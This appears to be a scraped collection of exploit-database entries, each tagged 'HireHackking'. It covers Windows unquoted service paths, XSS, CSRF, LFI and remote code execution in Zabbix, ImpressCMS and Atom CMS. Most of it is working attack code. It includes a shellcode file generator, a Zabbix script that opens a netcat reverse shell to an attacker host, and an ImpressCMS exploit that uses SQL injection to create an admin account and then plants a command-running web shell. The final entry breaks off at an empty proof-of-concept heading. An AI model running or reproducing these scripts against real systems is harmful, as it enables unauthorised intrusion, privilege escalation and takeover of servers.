buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b"
buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0"
buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff"
buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a"
buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31"
buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a"
buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28"
buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"
buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79"
buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00"
buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00"
padding ="C" * (len(buffer) - len(push_esp) - len(nops))
payload = buffer  + push_esp + nops + buf + padding
try:
    with open("0day_Hejap.txt","wb") as f:
        print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload))
        f.write(payload)
        f.close()
        print("[+] File created!")
except:
    print("[-]File cannot be created")
HireHackking 
# Exploit Title: Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path
# Discovery by: Mohamed Alzhrani
# Discovery Date: 2022-03-08
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/drfone_full3360.exe
# Tested Version: 12.0.18
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path: 

C:\Users\0xMaz>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Wondershare Install Assist Service	Wondershare InstallAssist	C:\ProgramData\Wondershare\Service\InstallAssistService.exe 	Auto


# Service info:

C:\Users\0xMaz>sc qc "Wondershare InstallAssist"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Wondershare InstallAssist
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\ProgramData\Wondershare\Service\InstallAssistService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wondershare Install Assist Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

The local user able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking 
# Exploit Title: BattlEye 0.9 - 'BEService' Unquoted Service Path
# Date: 09/03/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.battleye.com/
# Software Link: https://www.battleye.com/downloads/
# Version: 0.94
# Tested: Windows 10 Pro 
# Contact: https://twitter.com/dmaral3noz


C:\Users\saudh>sc qc BEService

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BEService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BattlEye Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking 
# Exploit Title: McAfee® Safe Connect VPN - Unquoted Service Path Elevation Of Privilege
# Date: 09/03/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.mcafee.com/
# Software Link: https://www.mcafee.com/en-us/vpn/mcafee-safe-connect.html
# Version: 2.13
# Tested: Windows 10 x64
# Contact: https://twitter.com/dmaral3noz

C:\Users\saudh>sc qc SafeConnectService

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SafeConnectService

        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\McAfee\McAfee Safe Connect\SafeConnect.ServiceHost.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : McAfee Safe Connect Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking 
# Exploit Title: Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path
# Date: 09/03/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sony.com/
# Software Link: https://support.d-imaging.sony.co.jp/www/disoft/int/download/playmemories-home/win/en/index.html
# Version: 6.0
# Tested: Windows 10 Pro 
# Contact: https://twitter.com/dmaral3noz


C:\Users\saudh>sc qc PMBDeviceInfoProvider

[SC] QueryServiceConfig SUCCESS


SERVICE_NAME: PMBDeviceInfoProvider
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : PMBDeviceInfoProvider
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem



#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking 
# Exploit Title: Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)
# Date: 9/3/2022
# Exploit Author: Hussien Misbah
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/rn/rn5.0.17
# Version: 5.0.17
# Tested on: Linux
# Reference: https://github.com/HussienMisbah/tools/tree/master/Zabbix_exploit

#!/usr/bin/python3
# note : this is blind RCE so don't expect to see results on the site 
# this exploit is tested against Zabbix 5.0.17 only

import sys
import requests
import re 
import random
import string
import colorama
from colorama import Fore


print(Fore.YELLOW+"[*] this exploit is tested against Zabbix 5.0.17 only")
print(Fore.YELLOW+"[*] can reach the author @ https://hussienmisbah.github.io/")


def item_name() :
    letters = string.ascii_letters
    item =  ''.join(random.choice(letters) for i in range(20)) 
    return item

if len(sys.argv) != 6 :
    print(Fore.RED +"[!] usage : ./expoit.py <target url>  <username> <password> <attacker ip> <attacker port>")
    sys.exit(-1)

url  = sys.argv[1]
username =sys.argv[2]
password = sys.argv[3]
host = sys.argv[4]
port = sys.argv[5]


s = requests.Session()


headers ={ 
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
}

data = {  
"request":"hosts.php", 
"name"  : username ,
"password" : password ,
"autologin" :"1" ,
"enter":"Sign+in"
}


proxies = {
   'http': 'http://127.0.0.1:8080'
}


r = s.post(url+"/index.php",data=data)  #proxies=proxies)

if "Sign out" not in r.text :
    print(Fore.RED +"[!] Authentication failed")
    sys.exit(-1)
if "Zabbix 5.0.17" not in r.text :
    print(Fore.RED +"[!] This is not Zabbix 5.0.17")
    sys.exit(-1)

if "filter_hostids%5B0%5D=" in r.text :
    try :
        x = re.search('filter_hostids%5B0%5D=(.*?)"', r.text)
        hostId = x.group(1)
    except :
        print(Fore.RED +"[!] Exploit failed to resolve HostID")
        print(Fore.BLUE +"[?] you can find it under /items then add item")
        sys.exit(-1)
else :
    print(Fore.RED +"[!] Exploit failed to resolve HostID")
    print(Fore.BLUE +"[?] you can find HostID under /items then add item")
    sys.exit(-1)


sid= re.search('<meta name="csrf-token" content="(.*)"/>',r.text).group(1) # hidden_csrf_token


command=f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {host} {port}  >/tmp/f"

payload = f"system.run[{command},nowait]"
Random_name = item_name()
data2 ={
    
"sid":sid,"form_refresh":"1","form":"create","hostid":hostId,"selectedInterfaceId":"0","name":Random_name,"type":"0","key":payload,"url":"","query_fields[name][1]":"","query_fields[value][1]":"","timeout":"3s","post_type":"0","posts":"","headers[name][1]":"","headers[value][1]":"","status_codes":"200","follow_redirects":"1","retrieve_mode":"0","http_proxy":"","http_username":"","http_password":"","ssl_cert_file":"","ssl_key_file":"","ssl_key_password":"","interfaceid":"1","params_es":"","params_ap":"","params_f":"","value_type":"3","units":"","delay":"1m","delay_flex[0][type]":"0","delay_flex[0][delay]":"","delay_flex[0][schedule]":"","delay_flex[0][period]":"","history_mode":"1","history":"90d","trends_mode":"1","trends":"365d","valuemapid":"0","new_application":"","applications[]":"0","inventory_link":"0","description":"","status":"0","add":"Add"
}

r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"} )


no_pages= r2.text.count("?page=") 

#################################################[Searching in all pages for the uploaded item]#################################################
page = 1
flag=False
while page <= no_pages :
    r_page=s.get(url+f"/items.php?page={page}" ,headers=headers )
    if  Random_name in r_page.text :
        print(Fore.GREEN+"[+] the payload has been Uploaded Successfully")
        x2 = re.search(rf"(\d+)[^\d]>{Random_name}",r_page.text)
        try :
            itemId=x2.group(1)
        except :
            pass

        print(Fore.GREEN+f"[+] you should find it at {url}/items.php?form=update&hostid={hostId}&itemid={itemId}")
        flag=True
        break 

    else :
        page +=1

if flag==False :
        print(Fore.BLUE +"[?] do you know you can't upload same key twice ?")
        print(Fore.BLUE +"[?] maybe it is already uploaded so set the listener and wait 1m")
        print(Fore.BLUE +"[*] change the port and try again")
        sys.exit(-1)

#################################################[Executing the item]#################################################


data2["form"] ="update"
data2["selectedInterfaceId"] = "1"
data2["check_now"]="Execute+now"
data2.pop("add",None)
data2["itemid"]=itemId,

print(Fore.GREEN+f"[+] set the listener at {port} please...")

r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"}) # ,proxies=proxies )

print(Fore.BLUE+ "[?] note : it takes up to +1 min so be patient :)")
answer =input(Fore.BLUE+"[+] got a shell ? [y]es/[N]o: ")

if "y" in answer.lower() :
    print(Fore.GREEN+"Nice !")
else :
    print(Fore.RED+"[!] if you find out why please contact me ")

sys.exit(0)
HireHackking 
# Exploit Title: ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure
# Exploit Author: LiquidWorm

Vendor: Integrated Control Technology Ltd.
Product web page: https://www.ict.co
Affected version: GX: Ver: 2.08.1002 K1B3
                      Lib: 04.00.217
                      Int: 2.3.235.J013
                      OS: 2.0.20
                  WX: Ver: 4.00 284 H062
                      App: 02.08.766
                      Lib: 04.00.169
                      Int: 02.2.208

Summary: Protege GX is an enterprise level integrated access control, intrusion
detection and building automation solution with a feature set that is easy to
operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,
web-based, cross-platform system that gives you a fully functional access control
and intrusion detection solution in a fraction of the time of conventional software.
With no software to install, setup is quick and simple. Connect the Controller and
system components, then open a web browser to launch the intuitive wizard-driven
interface which guides you through the process of configuring your system.

Desc: The application is vulnerable to improper access control that allows an
authenticated operator to disclose SHA1 password hashes (client-side) of other
users/operators.

Tested on: Microsoft-WinCE/6.00


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5700
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php


08.02.2022

--


Navigate to http://CONTROLLER_IP/operator.htm

Source:

<p><label id="OperatorPassword">Password</label><input type="password" id="Password" value="" class="narrow" readonly=""> <input type="button" id="ButtonChangeOperatorPassword" class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change Password"></p>
...
...
<input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc">
...
HireHackking 
# Exploit Title: ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)
# Exploit Author: LiquidWorm

Vendor: Integrated Control Technology Ltd.
Product web page: https://www.ict.co
Affected version: GX: Ver: 2.08.1002 K1B3
                      Lib: 04.00.217
                      Int: 2.3.235.J013
                      OS: 2.0.20
                  WX: Ver: 4.00 284 H062
                      App: 02.08.766
                      Lib: 04.00.169
                      Int: 02.2.208

Summary: Protege GX is an enterprise level integrated access control, intrusion
detection and building automation solution with a feature set that is easy to
operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,
web-based, cross-platform system that gives you a fully functional access control
and intrusion detection solution in a fraction of the time of conventional software.
With no software to install, setup is quick and simple. Connect the Controller and
system components, then open a web browser to launch the intuitive wizard-driven
interface which guides you through the process of configuring your system.

Desc: The application suffers from an authenticated stored XSS vulnerability.
The issue is triggered when input passed to the 'Name' parameter is not properly
sanitized before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an
affected site.

Tested on: Microsoft-WinCE/6.00


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5699
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5699.php


08.02.2022

--


UI navigation:
--------------

Scheduling > Daylight Savings > (Name field).


Decrypted POST request:
-----------------------

POST /daylightsaving.htm

Command&Type=Submit&SubType=GXT_DAYLIGHTSAVINGS_TBL&DaylightSavingId=1&action=update&Name=ZSL%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&StartMonth=10&EndMonth=2&StartDay=41&EndDay=41&RecId=1


Encrypted GET request:
----------------------

http://CONTROLLER_IP/PRT_CTRL_DIN_ISAPI.dll?8F7FFABE947FEE9C78850F2BA679A3B1645F6378696B32385B56303C43604B48F8CD082303AADCFCECEA082384C860AB16159DADCD89C9A7A2A47EE1F49A7A98AC9A8572882F88FAE5409CF6E06E04DA7F7D10AA6D45525C62B2A62FD949FF00E6B6B7471010908D9A59FBA1D9F304AD8CB24E0CE317A0870AA5A5253F0FCD58CA2BC874AC002CB62422E184FB9F13161C9C00E08F258B8519578EA2793A0C28A4AF51CF65637C0C2F972CE3F49703214A63AA78B3EBE5C720DBE1E9C97E772334EC95480956E27DB6D1DF4489C5D60CCE27D69B388CA6C69A9DC72D85127F870DDA4E459CA245508EBFD66D1C83D9FA12838C1F426E538D5D75192B57DF5AF6


Additional info:
----------------

Databse backup predictable name: Db_D3037E8A_8_Feb_22.bak
The D3037E8A is the serial number of the onboard reader.

Encrypt/Decrypt functions:
--------------------------

From console:
> localStorage.getItem("WXKey")
< '8EDB22D9FB767538'

function encryptAES(a, c) {
    a = a.toString();
    a = unescape(encodeURIComponent(a));
    "undefined" == typeof c && (c = !0);
    if (0 == servertype)
        return a;
    var b = localStorage.getItem("WXKey");
    if ("" == b || null == b)
        return a;
    for (var d = "", e = 0; 16 > e; e++)
        d += String.fromCharCode(Math.floor(75 * Math.random() + 48));
    a = d + mcrypt.Encrypt(addPKCS7(a), d, b, "rijndael-128", "cbc");
    return a = c ? getCookie("SESSID") + strToHex(a) : strToHex(a)
}

function decryptAES(a) {
    if (null == a)
        return "";
    a = a.toString();
    if ("<invalid session> < Packet not Init and not encrypted. >" == a)
        a = 0 == servertype ? "login.php" : "login.htm",
        window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();
    else if ("<invalid session>" == a.substr(0, 17))
        a = 0 == servertype ? "login.php?logout" : "login.htm?logout",
        window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();
    else {
        if (0 == servertype)
            return a;
        var c = localStorage.getItem("WXKey");
        if ("" == c)
            return a;
        a = hexToStr(a);
        var b = a.substr(0, 16);
        a = a.substr(16, a.length);
        a = mcrypt.Decrypt(a, b, c, "rijndael-128", "cbc").replace(/\x00+$/g, "");
        a = removePKCS7(a);
        return a = decodeURIComponent(escape(a))
    }
HireHackking 
# Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated
# Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/
# Date: 23-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/
# Version: 3.7.3
# Tested on: Firefox

# Vulnerable File: dispatcher.php

# Vulnerable Code:

```
if ( isset($_GET['open']) ) {
    include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
} else {
    echo '
        <div id="welcome-panel" class="welcome-panel"
style="padding-bottom: 20px;">
                <div class="welcome-panel-column-container">';

    include_once( ABSPATH . WPINC . '/feed.php' );
```

# Proof of Concept:

localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]
HireHackking 
# Exploit Title: ProtonVPN 1.26.0 - Unquoted Service Path
# Date: 22/03/2022
# Exploit Author: gemreda (@gemredax)
# Vendor Homepage: https://protonvpn.com/
# Software Link: https://protonvpn.com/
# Version: 1.26.0
# Tested: Windows 10 x64
# Contact: gemredax@pm.me

PS C:\Users\Emre> sc.exe qc "ProtonVPN Wireguard"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ProtonVPN Wireguard
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe C:\ProgramData\ProtonVPN\WireGuard\ProtonVPN.conf
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ProtonVPN WireGuard
        DEPENDENCIES       : Nsi
                           : TcpIp
        SERVICE_START_NAME : LocalSystem


#Exploit:

The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path.
If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as "C:\Program.exe" to be run by a privileged program making use of WinExec.
HireHackking 
# Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE)
# Exploit Author: Egidio Romano aka EgiX
# Date: 30/03/2022
# Version: <= 1.4.2
# Venor: https://www.impresscms.org
# CVE: CVE-2021-26599

<?php

/*
    ----------------------------------------------------------
    ImpressCMS <= 1.4.2 SQL Injection to Remote Code Execution
    ----------------------------------------------------------
    
    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s[at]gmail[dot]com
    software link.......: https://www.impresscms.org
    
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
    
    [-] Vulnerability Description:
      
    User input passed through the "groups" POST parameter to the /include/findusers.php script is not
    properly sanitized before being passed to the icms_member_Handler::getUserCountByGroupLink() and
    icms_member_Handler::getUsersByGroupLink() methods. These methods use the first argument to
    construct a SQL query without proper validation, and this can be exploited by remote attackers
    to e.g. read sensitive data from the "users" database table through boolean-based SQL Injection
    attacks. The application uses PDO as a database driver, which allows for stacked SQL queries,
    as such this vulnerability could be exploited to e.g. create a new admin user and execute
    arbitrary PHP code.
    
    [-] CVE Reference:

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2021-26599 to this vulnerability.

    [-] Disclosure timeline:
    
    [19/01/2021] - Vendor notified through HackerOne
    [29/01/2021] - Vulnerability acknowledged by the vendor
    [03/02/2021] - CVE number assigned
    [06/02/2022] - Version 1.4.3 released, vulnerability not correctly fixed
    [11/02/2022] - Vendor was informed about the ineffective fix
    [09/03/2022] - Version 1.4.4 released
    [22/03/2022] - Public disclosure
    
    [-] Technical writeup:

    http://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce
*/

set_time_limit(0);
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

function hex_enc($input)
{
    for ($i = 0; $i < strlen($input); $i++)
    	$encoded .= sprintf("%02x", ord($input[$i]));
    return "0x{$encoded}";
}

print "+-----------------------------------------------------------+\n";
print "| ImpressCMS <= 1.4.2 Remote Code Execution Exploit by EgiX |\n";
print "+-----------------------------------------------------------+\n";

if ($argc != 2)
{
    print "\nUsage: php $argv[0] <URL>";
    print "\nExample.: php $argv[0] http://localhost/impresscms/";
    print "\nExample.: php $argv[0] https://www.impresscms.org/\n\n";
    die();
}

$url = $argv[1];
$ch  = curl_init();

curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

print "\n[+] Retrieving security token (CVE-2021-26598)\n"; 

curl_setopt($ch, CURLOPT_URL, "{$url}misc.php?action=showpopups&type=friend");

$res = curl_exec($ch);

if (!preg_match("/(cookie: [^;]+); path/i", $res, $sid)) die("[-] Session coookie not found!\n");
if (!preg_match("/TOKEN_REQUEST' value='([^']+)'/", $res, $token)) die("[-] Token not found!\n");

print "[+] Starting SQL Injection attack (CVE-2021-26599)\n";
print "[*] Step 1: retrieving database name\n";

curl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php");
curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1]]);

$params = "user_submit=1&token={$token[1]}&groups[]=%s";

$min = true;
$idx = 1;

while(1)
{
    $test = 256;

    for ($i = 7; $i >= 0; $i--)
    {
	$test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));
	$sql  = "1) AND ORD(SUBSTR(DATABASE(),{$idx},1))<{$test}#";
	curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
	$min = !preg_match("/No Users Found/", curl_exec($ch));
    }

    if (($chr = $min ? ($test - 1) : ($test)) == 0) break;
    $dbname .= chr($chr); $min = true; $idx++;
    print "\r[+] DB name: {$dbname}";
}

print "\n[*] Step 2: retrieving tables prefix\n";

$sub = "SELECT TRIM(TRAILING 'users' FROM table_name) FROM information_schema.tables WHERE table_schema='{$dbname}' AND table_name LIKE '%users'";
$min = true;
$idx = 1;

while(1)
{
    $test = 256;

    for ($i = 7; $i >= 0; $i--)
    {
	$test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));
	$sql  = hex_enc("SELECT IF(ORD(SUBSTR(({$sub}),{$idx},1))<{$test},1,SLEEP(1))");
	$sql  = "0); SET @q = {$sql}; PREPARE stmt FROM @q; EXECUTE stmt;#";
	curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
	$start = time(); curl_exec($ch); $secs = time() - $start;
	$min = ($secs < 2);
    }

    if (($chr = $min ? ($test - 1) : ($test)) == 0) break;
    $prefix .= chr($chr); $min = true; $idx++;
    print "\r[+] Prefix: {$prefix}";
}

print "\n[*] Step 3: creating new admin user\n";

$uid = time();
$enc = hex_enc("egix");
$pwd = hex_enc(md5("egix"));
$sql = "0); INSERT INTO {$prefix}users (uid, uname, login_name, pass, level, enc_type) VALUES ({$uid}, {$enc}, {$enc}, {$pwd}, 5, 0)#";

curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
curl_exec($ch);

$sql = "0); INSERT INTO {$prefix}groups_users_link (groupid, uid) VALUES (1, {$uid})#";

curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
curl_exec($ch);

print "[+] Trying to login as the new user\n";

curl_setopt($ch, CURLOPT_URL, "{$url}user.php");
curl_setopt($ch, CURLOPT_POSTFIELDS, "uname=egix&pass=egix&op=login");

if (!preg_match("/(cookie: [^;]+); path/i", curl_exec($ch), $sid)) die("[-] Login failed!\n");

print "[+] Creating malicious autotask\n";

$phpcode = urlencode("if (isset(\$_SERVER[HTTP_CMD])) { print(____); passthru(base64_decode(\$_SERVER[HTTP_CMD])); die; }");

curl_setopt($ch, CURLOPT_URL, "{$url}modules/system/admin.php");
curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1], "Referer: {$url}"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, "fct=autotasks&sat_name=rce&sat_code={$phpcode}&sat_enabled=1&op=addautotasks");

if (!preg_match("/HTTP.*302/i", curl_exec($ch))) die("[-] Something went wrong!\n");

print "[+] Launching shell\n";

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, false);

while(1)
{
    print "\nimpresscms-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
    preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
HireHackking 
# Exploit Title: Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)
# Date: 2022-03-22
# Author: Milad karimi
# Software Link: https://www.drupal.org/project/avatar_uploader
# Version: v7.x-1.0-beta8
# Tested on: Windows 10
# CVE: N/A

1. Description:
This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:
http://$target/avatar_uploader.pages.inc?file=<script>alert("test")</script>
HireHackking 
# Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE)
# Date: 22.03.2022
# Exploit Author: Ashish Koli (Shikari)
# Vendor Homepage: https://thedigitalcraft.com/
# Software Link: https://github.com/thedigicraft/Atom.CMS
# Version: 2.0
# Tested on: Ubuntu 20.04.3 LTS
# CVE: CVE-2022-25487

# Description
This script uploads webshell.php to the Atom CMS. An application will store that file in the uploads directory with a unique number which allows us to access Webshell.

# Usage : python3 exploit.py <IP> <Port> <atomcmspath>
# Example:  python3 exploit.py 127.0.0.1 80 /atom

# POC Exploit: https://youtu.be/qQrq-eEpswc
# Note: Crafted "Shell.txt" file is required for exploitation which is available on the below link:
# https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC

'''
Description:
A file upload functionality in Atom CMS 2.0 allows any
non-privileged user to gain access to the host through the uploaded files,
which may result in remote code execution.
'''

#!/usr/bin/python3
'''
Import required modules:
'''
import sys
import requests
import json
import time
import urllib.parse
import struct
import re
import string
import linecache



proxies = {
   'http': 'http://localhost:8080',
   'https': 'https://localhost:8080',
}

'''
User Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
atomcmspath = sys.argv[3]


'''
Get cookie
'''
session = requests.Session()
link = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin'
response = session.get(link)
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')

'''
Upload Webshell:
'''
# Construct Header:
header1 = {
    'Host': target_ip,    
    'Accept': 'application/json',
    'Cache-Control': 'no-cache',
    'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',
    'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L',
    'Origin': 'http://' + target_ip,
    'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9',
    'Cookie': cookie,
    'Connection': 'close',
    
}


# loading Webshell payload: 
path = 'shell.txt'
fp = open(path,'rb')
data= fp.read()


# Uploading Webshell:
link_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1'
upload = requests.post(link_upload, headers=header1, data=data)

p=upload.text
x = re.sub("\s", "\n", p)
y = x.replace("1<br>Unknown", "null")
z = re.sub('[^0-9]', '', y)

'''
Finish:
'''
print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php')
print('')
HireHackking 
# Exploit Title: WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/curtain/
# Version: 1.0.2
# Tested on: Firefox

## Summary:

Cross site forgery vulnerability has been identified in curtain WordPress plugin that allows an attacker to to activate or deactivate sites maintenance mode.

## Vulnerable URL:

http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0

## CSRF POC Exploit

```
<html>
  <body>
    <form action="http://localhost:10003/wp-admin/options-general.php">
      <input type="hidden" name="page" value="curtain" />
      <input type="hidden" name="&#95;wpnonce" value="" />
      <input type="hidden" name="mode" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
HireHackking 
# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/
# Version: 1.0.3
# Tested on: Firefox
# Vulnerable File: tblight.php

# Impact:

Local File Read / Code Execution

# Vulnerable Code:

```
if(!empty($_GET['controller']) && !empty($_GET['action']) &&
!empty($_GET['ajax']) && $_GET['ajax'] == 1)
{
    require_once('' . 'controllers/'.$_GET['controller'].'.php');
}
```

# Proof of concept:

